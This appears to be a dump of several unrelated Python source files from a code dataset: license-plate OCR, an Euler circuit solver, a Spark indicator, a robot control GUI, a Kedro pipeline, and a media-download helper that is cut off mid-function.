cv2.ADAPTIVE_THRESH_GAUSSIAN_C,cv2.THRESH_BINARY_INV, 21, 5)\r\n\topened = cv2.morphologyEx(thresh2, cv2.MORPH_OPEN, kernel3)\r\n\r\n\t# Displaying various filtered plates\r\n\tcv2.imshow('Grayscale',gray)\r\n\tcv2.imshow('Gaussian Blurred',blur)\r\n\tcv2.imshow('Binary',binary)\r\n\tcv2.imshow('Eroded',thre_mor)\r\n\tcv2.imshow('Adaptive Thresholded',thresh2)\r\n\tcv2.imshow('Morphologically Opened',opened)\r\n\tcv2.waitKey(0)\r\n\r\n\t# Returning the processed plate\r\n\treturn opened\r\n\r\n# This function sorts the characters according to their x-coordinate i.e. 
from left to right\r\ndef sort_contours(cnts):\r\n\t# Creating bounding box for every character contour\r\n\tboundingBoxes = [cv2.boundingRect(c) for c in cnts]\r\n\t(cnts, boundingBoxes) = zip(*sorted(zip(cnts, boundingBoxes),key=lambda b: b[1][0]))\r\n\treturn cnts\r\n\r\n# This function detects the contours of all characters and returns a list containing all the cropped characters\r\ndef character_segmentation(plate_image,processed_plate):\r\n\ttry:\t\r\n\t\t# Creating copies of plate_image to draw character contours and their bounding boxes\r\n\t\ttest_roi = plate_image.copy()\r\n\t\ttest_box = plate_image.copy()\r\n\r\n\t\t# Finding contours in the processed plate\r\n\t\tcont, _  = cv2.findContours(processed_plate, cv2.RETR_LIST , cv2.CHAIN_APPROX_SIMPLE)\r\n\r\n\t\t# Drawing the contours in the copy image\r\n\t\t_=cv2.drawContours(test_roi,cont,-1,(255,0,255),2)\r\n\r\n\t\t# Initializing several lists-\r\n\t\tchar_list=[]                # To store co-ordinates of all possible characters\r\n\t\theight_list=[]\t\t\t\t# To store heights of all characters\r\n\t\tcrop_characters=[]\t\t\t# To store cropped images of all characters \r\n\r\n\t\t# Here some approximations are used to filter out the character contours from other contours\r\n\t\t# Traversing in the sorted list of all contours\r\n\t\tfor i,c in enumerate(sort_contours(cont)):\r\n\t\t\t# Getting co-ordinates of contours\r\n\t\t\t(x,y,w,h) = cv2.boundingRect(c)\r\n\t\t\t\r\n\t\t\t# Selecting contours with defined h/w ratio\r\n\t\t\tratio=h/w\r\n\t\t\tif 1<=ratio<=10:\r\n\r\n\t\t\t\t# Selecting contours whose height is larger than 35% of the plate but less than the whole height\r\n\t\t\t\tif 0.35<=h/plate_image.shape[0]<0.9: \r\n\t\t\t\t\t\r\n\t\t\t\t\t# To avoid redundant characters in case of O and D because inner and outer regions are detected as separate contours\r\n\t\t\t\t\tif len(char_list)>1:\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t\t# If the absolute difference of x-coordinates of two contours is less than 8 pixels then we simply skip the second one\r\n\t\t\t\t\t\tif abs(x-char_list[-1][0])<8:continue\r\n\r\n\t\t\t\t\t# Appending those contours which satisfy the above approximations\r\n\t\t\t\t\tchar_list.append((x,y,w,h))\r\n\t\t\t\t\theight_list.append(h)\r\n\r\n\t\t# Still there might be some non-character contours present in char_list\r\n\t\t# Filtering out by selecting only those contours which are approximately the same height as most of the contours present in the char_list\r\n\t\tapx_height=Counter(height_list).most_common()[0][0]\r\n\t\tfor x,y,w,h in char_list:\r\n\r\n\t\t\t# Selecting only those which are approximately equal to the apx_height\r\n\t\t\tif apx_height-3<=h<=apx_height+3:\r\n\t\t\t\t# Cropping characters from processed_plate\r\n\t\t\t\tcurr_num = processed_plate[y:y+h,x:x+w] # previously this was cropped from the binary image\r\n\t\t\t\tcurr_num = cv2.resize(curr_num, dsize=(30,60))\r\n\t\t\t\t # Removing blurriness from characters\r\n\t\t\t\t_, curr_num = cv2.threshold(curr_num, 220, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)\r\n\t\t\t\t# Storing characters in the final list\r\n\t\t\t\tcrop_characters.append(curr_num)\r\n\t\t\t\t# Drawing bounding boxes around detected characters\r\n\t\t\t\tcv2.rectangle(test_box, (x, y), (x + w, y + h), (0, 255,0), 2)\r\n\r\n\t\t# Displaying contours and bounding boxes of characters in the plate\r\n\t\tcv2.imshow('Contours',test_roi)\r\n\t\tcv2.imshow('Bounding Boxes',test_box)\r\n\t\tcv2.waitKey(0)\r\n\r\n\t\t# Returning final list of characters\r\n\t\treturn crop_characters\r\n\r\n\t# In case of error in detecting 
plate\r\n\texcept:\r\n\t\tprint(\"Sorry! The plate isn't detected properly\")\r\n\t\tsys.exit()\r\n\r\n# This function loads the MobileNets model pretrained on ImageNet dataset and fine tuned for detecting characters\r\ndef load_model():\r\n\r\n\t# Loading model architecture\r\n\tjson_file = open('MobileNets_character_recognition.json','r')\r\n\tloaded_model_json = json_file.read()\r\n\tjson_file.close()\r\n\r\n\t# Loading weights\r\n\tmodel = model_from_json(loaded_model_json)\r\n\tmodel.load_weights(\"License_character_recognition_weight.h5\")\r\n\tprint(\"[INFO] Model loaded successfully...\")\r\n\r\n\t# Loading labels\r\n\tlabels = LabelEncoder()\r\n\tlabels.classes_ = np.load('license_character_classes.npy')\r\n\tprint(\"[INFO] Labels loaded successfully...\")\r\n\r\n\treturn model,labels\r\n\r\n# This function predicts the character in the image\r\ndef predict_from_model(image,model,labels):\r\n\r\n\t# Reshaping numpy array according to the input layer of the model\r\n\timage = cv2.resize(image,(80,80))\r\n\r\n\t# Transforming image to 3-D because the model takes 3-D images as input\r\n\timage = np.stack((image,)*3, axis=-1)\r\n\r\n # Inverse transforming the prediction to get its label\r\n\tprediction = labels.inverse_transform([np.argmax(model.predict(image[np.newaxis,:]))])\r\n\r\n\t# Returning the prediction as a single character array\r\n\treturn prediction\r\n\r\n# This is the main function\r\ndef main(img):\r\n\t# Path of the image whose plate is to be detected\r\n\tpath = './Dataset/'+img\r\n\t\r\n\t# Reading the image\r\n\timage = cv2.imread(path)\r\n\r\n\t# Displaying the image\r\n\tcv2.imshow(\"Initial Image\", image)\r\n\tcv2.waitKey(0) \r\n\t\r\n\t# Extracting the plate and its details from the image\r\n\tdetected_image,plate_image,x,y = extract_plate(image)\r\n\r\n\t# Processing the plate before character segmentation\r\n\tprocessed_plate = process_plate(plate_image)\r\n\r\n\t# Performing character segmentation on processed_plate\r\n\tcrop_characters = character_segmentation(plate_image,processed_plate)\r\n\r\n\t# Loading pre-trained model and labels\r\n\tmodel,labels = load_model()\r\n\r\n\t# Creating a figure to display segmented characters\r\n\tfig = plt.figure(figsize=(10,3))\r\n\tfig.suptitle('Segmented Characters')\r\n\tcols = len(crop_characters)\r\n\r\n\t# If all characters aren't detected properly we stop the program\r\n\tif cols<6:\r\n\t\tprint(\"Sorry! 
The plate isn't detected properly\")\r\n\t\tsys.exit()\r\n\r\n\t# Creating grid to hold subplots(character images)\r\n\tgrid = gridspec.GridSpec(ncols=cols,nrows=1,figure=fig)\r\n\r\n\t# Finally predicting each character image and displaying its predicted label as the title of subplot\r\n\tfinal_string = ''\r\n\tfor i,character in enumerate(crop_characters):\r\n\t fig.add_subplot(grid[i])\r\n\t title = np.array2string(predict_from_model(character,model,labels))\r\n\t plt.title('{}'.format(title.strip(\"'[]\"),fontsize=20))\r\n\t final_string+=title.strip(\"'[]\")\r\n\t plt.axis(False)\r\n\t plt.imshow(character,cmap='gray')\r\n\tplt.show()\r\n\r\n\t# Displaying the final output image\r\n\tdetected_image=cv2.putText(detected_image,final_string,(x+50,y-20),cv2.FONT_HERSHEY_SIMPLEX,1,(0,255,0),2)\r\n\tprint(final_string)\r\n\tcv2.imshow('Final Image', detected_image)\r\n\tcv2.waitKey(0)\r\n\r\nif __name__=='__main__':\r\n\r\n\t# Setting path of the dataset\r\n\tdataset_path=os.path.join(os.getcwd(),'Dataset')\r\n\r\n\t# Acquiring all the images in the dataset\r\n\timage_list=os.listdir(dataset_path)\r\n\r\n\t# Selecting a random image from our dataset\r\n\tn=random.randrange(0,len(image_list))\r\n\trandom_image=image_list[n]\r\n\tprint(random_image)\r\n\t# Passing random_image for number plate recognition\r\n\tmain(random_image)","sub_path":"script2.py","file_name":"script2.py","file_ext":"py","file_size_in_byte":9627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"21156455","text":"#!/usr/bin/env python3\n\nimport collections\nimport sys\n\n# Read Graph\n\ndef read_graph():\n graph = collections.defaultdict(dict)\n\n for edge, line in enumerate(sys.stdin):\n s, t = map(int, line.split())\n graph[s][t] = edge\n graph[t][s] = edge\n\n return graph\n\n# Find Circuit\n\ndef find_circuit(graph, start, vertex, visited, path):\n ''' Recursive DFS traversal '''\n # If we have returned to start, return path\n if path and start == vertex:\n return path\n\n # Visit each unvisited outgoing edge\n for neighbor in graph[vertex]:\n if graph[vertex][neighbor] in visited:\n continue\n\n # Mark visited\n visited.add(graph[vertex][neighbor])\n\n # Add to path\n path.append((vertex, neighbor))\n\n # Recurse\n if find_circuit(graph, start, neighbor, visited, path):\n return path\n\n # Remove from path\n path.pop(-1)\n\n # Unmark visited\n visited.remove(graph[vertex][neighbor])\n\n # No circuit found, so return nothing\n return []\n\n# Find Eulerian Circuit\n\ndef find_euler_circuit(graph):\n ''' Iteratively compute subcircuit until all edges have been travsrsed or\n no circuit is possible '''\n start = list(graph.keys())[0] # Starting vertex\n visited = set() # Visited edges (set of edge ordinals)\n circuit = [] # Eulerian circuit (list of edges)\n index = 0 # Where in circuit to insert subcircuit\n\n while start:\n # Find subcircuit and insert it after current component\n path = find_circuit(graph, start, start, visited, [])\n circuit = circuit[0:index] + path + circuit[index:]\n\n # Check if any nodes in current circuit have an unused edge, if so, set\n # start so we search for subcircuit beginning at that vertex\n start = None\n for index, vertex in enumerate(source for source, target in circuit):\n for neighbor, edge in graph[vertex].items():\n if edge not in visited:\n start = vertex\n break\n\n return circuit\n\n# Main Execution\n\ndef main():\n graph = read_graph()\n circuit = find_euler_circuit(graph)\n\n for source, target in circuit:\n 
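# Emit one edge per line, mirroring the input format.\n        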
print(source, target)\n\nif __name__ == '__main__':\n main()\n","sub_path":"lecture11/exercise11-B/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":2340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"346729529","text":"import logging\nfrom settings import STARTED, ENDED, NS\nfrom usavich.indicator.coindicator import CoIndicator\nfrom usavich.utils.deco import indsetdecorator\nfrom usavich.indicator.base import Base\n\n\n@indsetdecorator\nclass MacInsUnins(Base):\n\n goal = 'mac'\n\n def compute(self):\n key = self.key\n goal = self.goal\n extend = self.extend\n full_context = self.context.__class__(STARTED, self.ended)\n ended_str = str(ENDED)\n ins_rdd = full_context.parsed_rdd(\n 'MacInsUnins').filter(lambda row: row.unins_dt_str < ended_str)\n co_ins_rdd = CoIndicator(rdd=ins_rdd)\n co_uv = co_ins_rdd.uv_by_flat_key(\n key, goal, extend, numSplits=NS(128))\n return co_uv\n","sub_path":"indicator/mac_unins.py","file_name":"mac_unins.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"602587610","text":"\"\"\"\n Capstone Project. Code to run on a LAPTOP (NOT the robot).\n Displays the Graphical User Interface (GUI) and communicates with the robot.\n\n Authors: Dr. Boutell, Dr. Mutchler (for the framework)\n and James Werne.\n Winter term, 2018-2019.\n\"\"\"\n\nimport mqtt_remote_method_calls as com\nimport tkinter\nfrom tkinter import ttk\nimport m2_gui\nimport rosebot\nimport time\n\n\nclass MyDelegate(object):\n \"\"\" Constructs PC delegate object. Has\n handlers for changing anxiety, changing\n hostility levels, and for printing on the\n console (for troubleshooting purposes)\"\"\"\n\n def __init__(self):\n self.enabled = True\n\n def handle_change_anxiety(self, distance):\n m2_gui.change_anxiety(int(distance))\n\n def handle_change_hostility(self):\n m2_gui.change_hostility()\n\n def print_on_pc(self, message):\n print(str(message))\n\n\ndef main():\n \"\"\"\n This code, which must run on a LAPTOP:\n 1. Constructs a GUI for my part of the Capstone Project.\n 2. 
Communicates via MQTT with the code that runs on the EV3 robot.\n \"\"\"\n # -------------------------------------------------------------------------\n # Construct and connect the MQTT Client:\n # -------------------------------------------------------------------------\n # Creates mqtt sender to call methods on robot\n pc_delegate = MyDelegate()\n mqtt_sender = com.MqttClient(pc_delegate)\n mqtt_sender.connect_to_ev3()\n\n # Created pc delegate, then used it as object to receive messages from robot\n mqtt_receiver = mqtt_sender\n\n # -------------------------------------------------------------------------\n # The root TK object for the GUI:\n # -------------------------------------------------------------------------\n # Created tkinter window\n root = tkinter.Tk()\n root.title(\"Capstone Project - James\")\n\n # -------------------------------------------------------------------------\n # The main frame, upon which the other frames are placed.\n # -------------------------------------------------------------------------\n # Established primary frame & gridded it\n main_frame = ttk.Frame(root, padding=10, borderwidth=5, relief=\"groove\")\n main_frame.grid()\n\n # -------------------------------------------------------------------------\n # Sub-frames for the m2_GUI\n # -------------------------------------------------------------------------\n # Called other frames using get_shared_frames method\n perform_frame, teleop_frame, arm_frame, control_frame, drivesystem_frame, soundmaker_frame = get_shared_frames(\n main_frame, mqtt_sender)\n\n # sprint_2_frame = sprint_2_frames(main_frame, mqtt_sender)\n # sprint_2_1_frame = sprint_3_frames(main_frame, mqtt_sender)\n # grid_frames(teleop_frame, arm_frame, control_frame, drivesystem_frame, soundmaker_frame, IR_Frame, color_sensor_frame,\n # cameraFrame, sprint_2_frame, sprint_2_1_frame)\n\n # -------------------------------------------------------------------------\n # Frames that are particular to my individual contributions to the project.\n # -------------------------------------------------------------------------\n # TODO: Implement and call get_my_frames(...)\n\n # -------------------------------------------------------------------------\n # Grid the frames.\n # -------------------------------------------------------------------------\n\n # Grids frames for Sprint 3\n real_grid_frames(perform_frame, teleop_frame)\n\n # -------------------------------------------------------------------------\n # The event loop:\n # -------------------------------------------------------------------------\n\n root.mainloop()\n\n\ndef get_shared_frames(main_frame, mqtt_sender):\n perform_frame = m2_gui.get_perform_frame(main_frame, mqtt_sender)\n teleop_frame = m2_gui.get_teleoperation_frame(main_frame, mqtt_sender)\n arm_frame = m2_gui.get_arm_frame(main_frame, mqtt_sender)\n control_frame = m2_gui.get_control_frame(main_frame, mqtt_sender)\n drivesystem_frame = m2_gui.get_drivesystem_frame(main_frame, mqtt_sender)\n soundmaker_frame = m2_gui.get_soundmaker_frame(main_frame, mqtt_sender)\n\n return perform_frame, teleop_frame, arm_frame, control_frame, drivesystem_frame, soundmaker_frame\n\n\ndef grid_frames(teleop_frame, arm_frame, control_frame, drivesystem_frame, soundmaker_frame, IR_Frame,\n color_sensor_frame,\n cameraFrame, sprint_2_frame, sprint_2_1_frame):\n teleop_frame.grid(row=0, column=0)\n arm_frame.grid(row=1, column=0)\n control_frame.grid(row=2, column=0)\n drivesystem_frame.grid(row=0, column=1)\n soundmaker_frame.grid(row=1, column=1)\n 
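# NOTE: the frames below are built by helper functions from earlier sprints; the current main() only grids the shared frames via real_grid_frames.\r\n    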
IR_Frame.grid(row=4, column=1)\n color_sensor_frame.grid(row=2, column=1)\n cameraFrame.grid(row=3, column=0)\n sprint_2_frame.grid(row=3, column=1)\n sprint_2_1_frame.grid(row=4, column=0)\n\n\ndef real_grid_frames(perform_frame, teleop_frame):\n # Grids frames for Sprint 3\n\n perform_frame.grid(row=0, column=0)\n teleop_frame.grid(row=1, column=0)\n\n\n# -------- Sprint 1-2 Code: ---------#\n\n\ndef handle_robot_proximity_tone(frequency_entry, inc_frequency_entry, mqtt_sender):\n print('Start at', frequency_entry.get(), 'Hz, then increase by', inc_frequency_entry.get(), \"Hz per inch\")\n mqtt_sender.send_message('robot_proximity_tone', [int(frequency_entry.get()), int(inc_frequency_entry.get())])\n\n\ndef handle_robot_point_to_object(mqtt_sender):\n print('Make Robot Point to Object')\n mqtt_sender.send_message('robot_point_to_object')\n\n\ndef handle_robot_proximity_led(frequency_entry, inc_frequency_entry, mqtt_sender):\n print('Start at', frequency_entry.get(), 'cycles per sec, then increase by', inc_frequency_entry.get(),\n \"cycles per inch\")\n mqtt_sender.send_message('robot_proximity_led', [int(frequency_entry.get()), int(inc_frequency_entry.get())])\n\n\ndef handle_camera_proximity_led(mqtt_sender):\n print('Go to object & blink while driving')\n mqtt_sender.send_message('camera_proximity_led')\n\n\ndef sprint_2_frames(window, mqtt_sender):\n frame = ttk.Frame(window, padding=10, borderwidth=5, relief=\"ridge\")\n\n frame_label = ttk.Label(frame, text=\"Sprint 2: Feature 9 & 10\")\n frame_label.grid(row=0, column=0)\n\n robot_proximity_tone_button = ttk.Button(frame, text=\"Make Tones Frequency Increase with Proximity\")\n robot_proximity_tone_button.grid(row=4, column=0)\n robot_frequency_label = ttk.Label(frame, text=\"Start Frequency:\")\n robot_frequency_entry_box = ttk.Entry(frame, width=8, justify=tkinter.RIGHT)\n robot_inc_frequency_label = ttk.Label(frame, text=\"Frequency Rate of Increase\")\n robot_inc_frequency_entry_box = ttk.Entry(frame, width=8, justify=tkinter.RIGHT)\n\n robot_frequency_label.grid(row=5, column=0)\n robot_frequency_entry_box.grid(row=5, column=1)\n robot_frequency_entry_box.insert(0, '440')\n robot_inc_frequency_label.grid(row=6, column=0)\n robot_inc_frequency_entry_box.grid(row=6, column=1)\n robot_inc_frequency_entry_box.insert(0, 20)\n\n robot_point_to_object_button = ttk.Button(frame, text=\"Make Robot Point Straight to Object\")\n robot_point_to_object_button.grid(row=7, column=0)\n\n robot_proximity_tone_button['command'] = lambda: handle_robot_proximity_tone(\n robot_frequency_entry_box, robot_inc_frequency_entry_box, mqtt_sender)\n robot_point_to_object_button['command'] = lambda: handle_robot_point_to_object(mqtt_sender)\n\n return frame\n\n\ndef sprint_3_frames(window, mqtt_sender):\n frame = ttk.Frame(window, padding=10, borderwidth=5, relief=\"ridge\")\n\n frame_label = ttk.Label(frame, text=\"Sprint 2: Feature 9 & 10\")\n frame_label.grid(row=0, column=0)\n\n robot_proximity_led_button = ttk.Button(frame, text=\"Make LED blink cycle Increase with Proximity\")\n robot_proximity_led_button.grid(row=4, column=0)\n robot_frequency_label = ttk.Label(frame, text=\"Start Cycle Rate:\")\n robot_frequency_entry_box = ttk.Entry(frame, width=8, justify=tkinter.RIGHT)\n robot_inc_frequency_label = ttk.Label(frame, text=\"Cycle Rate of Increase\")\n robot_inc_frequency_entry_box = ttk.Entry(frame, width=8, justify=tkinter.RIGHT)\n\n robot_frequency_label.grid(row=5, column=0)\n robot_frequency_entry_box.grid(row=5, column=1)\n 
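# Pre-fill the entry boxes with defaults so the handlers always receive parseable integers.\r\n    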
robot_frequency_entry_box.insert(0, '2')\r\n    robot_inc_frequency_label.grid(row=6, column=0)\r\n    robot_inc_frequency_entry_box.grid(row=6, column=1)\r\n    robot_inc_frequency_entry_box.insert(0, '2')\r\n\r\n    robot_camera_proximity_led_button = ttk.Button(frame, text=\"Make Robot Go To Object & Blink While Driving\")\r\n    robot_camera_proximity_led_button.grid(row=7, column=0)\r\n\r\n    robot_proximity_led_button['command'] = lambda: handle_robot_proximity_led(\r\n        robot_frequency_entry_box, robot_inc_frequency_entry_box, mqtt_sender)\r\n    robot_camera_proximity_led_button['command'] = lambda: handle_camera_proximity_led(mqtt_sender)\r\n\r\n    return frame\r\n\r\n\r\ndef printData(client):\r\n    client.send_message('printData')\r\n\r\n\r\ndef lookCW(client, box1, box2):\r\n    client.send_message('CW', [box1.get(), box2.get()])\r\n\r\n\r\ndef lookCCW(client, box1, box2):\r\n    client.send_message('CCW', [box1.get(), box2.get()])\r\n\r\n\r\n# -----------------------------------------------------------------------------\r\n# Calls main to start the ball rolling.\r\n# -----------------------------------------------------------------------------\r\nmain()\r\n","sub_path":"src/m2_run_this_on_laptop.py","file_name":"m2_run_this_on_laptop.py","file_ext":"py","file_size_in_byte":9372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"543856822","text":"from time import sleep\n\n\ndef maior(* num):\n    cont = maior = 0\n    print('Analyzing the values passed in...')\n    for v in num:\n        print(f'{v} ', end='', flush=True)\n        sleep(0.25)\n        if cont == 0:\n            maior = v\n        else:\n            if v > maior:\n                maior = v\n        cont += 1\n\n    print(f'A total of {cont} values were provided.')\n    print(f'The largest value provided was {maior}.')\n\n\ndef lin():\n    print('-=' * 30)\n\n\nlin()\nmaior(2, 9, 5, 10, 22, 3)\nlin()\nmaior(4, 3, 4, 99, 100, 21200)\nlin()\nmaior(298, 488, 309, 634, 678, 234, 845, 562, 147)\nlin()\nmaior(2928, 48138, 309, 634, 6478, 2394, 84335, 562, 101147)\nlin()\nmaior()\n","sub_path":"ex099.py","file_name":"ex099.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"537783942","text":"# -*- coding: utf-8 -*-\n# Copyright (c) Hebes Intelligence Private Company\n\n# This source code is licensed under the Apache License, Version 2.0 found in the\n# LICENSE file in the root directory of this source tree.\n\nfrom kedro.pipeline import Pipeline, node, pipeline\n\nfrom .nodes import fit_model, optimize_model\n\nbaseline = Pipeline(\n    [\n        node(\n            func=optimize_model,\n            inputs=[\n                \"model_input_data\",\n                \"location\",\n                \"model_config\",\n                \"feature_map\",\n                \"distance_metrics\",\n                \"params:of_optimize_model\",\n            ],\n            outputs=[\"opt_params\", \"optimized_model\"],\n            name=\"optimize_model\",\n        ),\n        node(\n            func=fit_model,\n            inputs=[\n                \"model_input_data\",\n                \"optimized_model\",\n            ],\n            outputs=\"mean_model\",\n            name=\"fit_model\",\n        ),\n    ]\n)\n\n\nbaseline_train = pipeline(\n    baseline,\n    inputs=[\n        \"location\",\n        \"model_config\",\n        \"feature_map\",\n    ],\n    outputs=[\"opt_params\", \"mean_model\"],\n    namespace=\"train\",\n)\n\n\ndef create_pipeline(**kwargs):\n    return Pipeline([baseline_train], tags=\"train\")\n","sub_path":"src/eensight/pipelines/baseline/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"467487682","text":"from requests import request, Timeout\nfrom requests.exceptions import SSLError\nfrom urllib3 
import disable_warnings, exceptions\nfrom os import listdir, makedirs, system\nfrom os.path import exists, isfile, basename\nfrom time import sleep\nfrom re import findall\nfrom bs4 import BeautifulSoup\nfrom collections import Counter\nfrom lxml import etree\nfrom urllib.request import build_opener, install_opener, ProxyHandler\nfrom multiprocessing import Pool, Manager\n\n\n\ndef get_ip():\n    pass\n\n\ndef check_local_merge(path, path_file_merged):\n    b = []\n    if isfile(path_file_merged):  # isfile returns a bool\n        return False, []  # the merged file already exists, nothing left to check\n    else:\n        ts_list = listdir(path)\n        if ts_list:  # non-empty list\n            ts_local = []\n            for ts in ts_list:\n                index = findall(\"(.*).ts\", ts)[0]\n                ts_local.append(int(index))\n        else:\n            ts_local = ts_list\n\n    # sort index_ts ascending; ts_local: all local ts indices as numbers\n    ts_local.sort()  # a no-op for an empty list\n    # look for isolated, not yet downloaded ts segments\n    for i in range(0, len(ts_local)-1):\n        i1 = ts_local[i]\n        i2 = ts_local[i + 1]\n        if i == 0 and i1 != 0:  # e.g. the case where only the first file, 0, is missing\n            lst = [a for a in range(i1)]\n            b = b + lst\n        elif i1 + 1 != i2:\n            lst = [a for a in range(i1 + 1, i2)]\n            b = b + lst\n    ts_dis = b\n    return ts_local, ts_dis\n\n\ndef check_local(path, *, mode=None, path_file_merged=None):\n    \"\"\"Check what has already been downloaded locally\n    :mode \"m3u8\":\n    return: ts_local (list) of ts file index numbers, int (leading zeros stripped),\n    :mode\n    , returns the finished list name_done and the unfinished dict name_ing\n    The last photo of an album carries a special marker in its file name; this marker is used to count the albums that are already fully downloaded\n\n    \"\"\"\n\n    if mode == \"m3u8\":\n        ts_local, ts_dis = check_local_merge(path, path_file_merged)\n        return ts_local, ts_dis\n\n    else:\n        file_list = listdir(path)\n        name_done = []  # albums finished locally\n        name_all = []\n        pat = \"L.jpg\"\n        for file in file_list:\n            fn = file.split('_')\n            name_all.append(fn[0])\n            if pat in file:  # keep file names that contain pat\n                name_done.append(fn[0])\n        name_ing = Counter(name_all)  # count the list elements, returns a dict\n        for name in name_done:\n            name_ing.pop(name)  # after the loop, name_ing holds the statistics of unfinished albums\n\n        return name_done, name_ing\n\n\ndef is_download(pics_dic, name_done_list, name_ing_dic):\n    \"\"\"Check the local download state for one page\n    Two kinds of arguments: pics_dic, coming from the web page, describes what should be downloaded; name_done_list (albums already finished) and name_ing_dic() describe the local state\n    Returns the 2 dicts of albums that still need downloading: {name: local count} & {name: url}\n    \"\"\"\n    name_pics_list = list(pics_dic)\n    name_ing_list = list(name_ing_dic)\n    done = []\n    doing = {}\n    undo = {}\n\n    for name_pics in name_pics_list:\n        if name_pics in name_done_list:\n            done.append(name_pics)\n        elif name_pics in name_ing_list:\n            doing[name_pics] = name_ing_dic[name_pics] + 1\n        else:\n            undo[name_pics] = 1\n\n    local_dic = undo.copy()\n    local_dic.update(doing)  # merge the two dicts\n    for name in done:\n        pics_dic.pop(name)\n        print(\"Already downloaded:\", name)\n\n    return local_dic, pics_dic\n\n\ndef send_requests(url, *, method=\"get\", need=\"response\",\n                  referer=None, origin=None, proxy=None):\n    \"\"\"\n    :param url: the target url\n    :param method: the request method, defaults to get\n    :param proxy: the proxy used for the request, defaults to the local IP\n    :param need: what should be returned; one of response, soup, xpath,\n    response: return the response object\n    soup: build a BeautifulSoup object, the caller then parses the page with BeautifulSoup\n    xpath: build an etree object, the caller then parses the page with xpath\n    :param referer: used to build the headers\n    :param origin: used to build the headers\n    \"\"\"\n\n    global response  # response is assigned inside the loop below, so it is declared global here\n    headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0'}\n    if referer is not None:\n        headers[\"referer\"] = referer\n    if origin is not None:\n        headers[\"origin\"] = origin\n    if proxy is None:\n        proxy = {}\n    # also route urllib through the proxy (used when going through a local tunnel)\n    if \"127.0.0.1\" in proxy.get(\"https\", \"\") or \"127.0.0.1\" in proxy.get(\"http\", \"\"):\n        opener = build_opener(ProxyHandler(proxy))\n        install_opener(opener)\n\n    # loop-control variables\n    verify = True\n    timeout = (13, 30)\n    while 1:\n        try:\n            response = request(method, url, headers=headers, proxies=proxy, timeout=timeout, 
verify=verify)\n response.close()\n if response.status_code != 200:\n print(response.status_code)\n print(\"\\rRetrying connection\", end='')\n continue\n break\n except Timeout:\n print(\"\\rRequest timed out\", end='')\n timeout = (13, 60)\n continue\n except SSLError:\n print(\"\\rDisabling verify\", end='')\n verify = False\n disable_warnings(exceptions.InsecureRequestWarning)\n continue\n\n # choose the return value\n if need == \"response\":\n return response\n elif need == \"soup\":\n soup = BeautifulSoup(response.text, 'html.parser')\n return soup\n elif need == \"xpath\":\n # tree = etree.parse('xpath.html') # how to open a local file instead\n tree = etree.HTML(response.text)\n return tree\n\n\ndef show_bar(num, nums):\n \"\"\"Download progress bar\"\"\"\n\n max_tep = 50 # length of the progress bar\n a = int(num / nums * max_tep // 1)\n b = '[' + '>' * a + ' ' * (max_tep - a) + ']'\n c = str(int(100 / max_tep * a))\n print('\\r{0}{1}%'.format(b, c), end='')\n if num == nums:\n print('')\n\n\ndef deal_input_num(input_num):\n \"\"\" Process numbers entered on the console\n Console input looks like: 3 91 5-9 8\n Elements are separated by spaces and come in two forms: single numbers (e.g. 3 91) and ranges (5-9)\n Desired result: [3 5 6 7 8 9 91], i.e. a deduplicated, ascending list of all input numbers (int)\n \"\"\"\n if input_num == '':\n input_list = []\n else:\n input_list = input_num.split() # split on spaces\n lx = [] # range expressions, e.g. [1-3, 3-6]\n lst = [] # ranges expanded, e.g. [1,2,3,3,4,5,6]\n for i in input_list:\n if '-' in i:\n lx.append(i) # collect the range expressions\n for i in lx: # expand the range expressions\n input_list.remove(i) # remove the range expression (e.g. 1-3) from the source list\n i = i.split('-')\n i = [n for n in range(int(i[0]), int(i[-1]) + 1)]\n lst = lst + i\n input_list = [int(i) for i in input_list] # convert to int\n input_list = input_list + lst # merge the two lists\n input_list = list(set(input_list)) # deduplicate\n input_list.sort() # sort ascending\n\n return input_list\n\n\ndef choice_download_path(path, path_default):\n \"\"\"\n Use the path entered by the user if given, otherwise use the default path\n Cannot verify that the entered path is well formed\n \"\"\"\n if path == '':\n path = path_default\n if not exists(path):\n makedirs(path)\n return path\n\n\ndef merge_files(path_dir, path_file, total):\n \"\"\"\n :param path_dir: path of the folder containing the files to merge\n :param path_file: path where the merged file is stored\n :param total: expected total number of files to merge\n \"\"\"\n\n name_file = basename(path_file)\n # check whether all ts files have been downloaded\n if len(listdir(path_dir)) == total:\n print(\"{1}Start merging: {0}{1}\".format(name_file, \"*\" * 25))\n # merge the ts files\n merge = r'copy /b \"{0}\\*.ts\" \"{1}\"'.format(path_dir, path_file)\n system(merge)\n if exists(path_file):\n # delete the ts files\n delete = r'rd /S/Q \"{0}\"'.format(path_dir)\n system(delete)\n sleep(0.5) # deleting the folder takes a moment\n if not exists(path_dir):\n print(\"{1}Merge succeeded: {0}{1}\".format(name_file, \"*\" * 25))\n else:\n print(\"Delete failed\")\n else:\n print(\"Merge failed\")\n else:\n print(\"ts files not fully downloaded\")\n\n\nclass Multiprocess(object):\n def __init__(self, **kwargs):\n self.referer = kwargs.get(\"referer\", None)\n self.origin = kwargs.get(\"origin\", None)\n self.proxy = kwargs.get(\"proxy\", None)\n\n def process_console(self, path_dir, download_list, length, *, url_pat, pat_mode=\"naked\"):\n \"\"\"\n :param path_dir: folder where the downloaded files are stored\n :param download_list: list of int indices of the files to download\n :param length: used for zero padding so the ts file names line up and merge correctly\n :param url_pat: url template; combined with a number from download_list it forms the full url\n :param pat_mode: whether the url template index is zero padded: \"zero\": padded; \"naked\": not padded\n \"\"\"\n\n # number of processes\n pool = 